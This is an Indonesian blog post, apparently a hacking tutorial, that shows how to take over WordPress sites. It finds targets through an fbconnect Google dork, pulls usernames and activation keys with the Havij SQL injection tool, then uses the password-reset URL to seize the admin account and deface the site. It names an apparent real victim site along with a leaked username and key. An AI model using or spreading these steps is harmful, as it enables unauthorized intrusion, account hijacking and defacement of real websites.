peralatan yang dibutuhkan adalah:
- Kompie terhubung internet :D
- Havij
- dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
- Kesabaran dalam mencari target
saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian "userid=" di tambahin tulisan " fb" jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14
kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu cari column user_login dan user_activation_key
heheh...dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu
wp-login.php?action=rp&key="kode aktivasi"&login="user login"
jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico
sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita
saya cukup ngedit home.php nya aja dah,hehehe
Tampilan Akhir Nya ..!!!
Cekidottttt
Cekidottttt
Posting Komentar
Jangan Lupa Tinggal Kan Komentar Agan " Disene ..!!!
Demi Kemajuan Blog Ane..!!
TerimKasih ..!!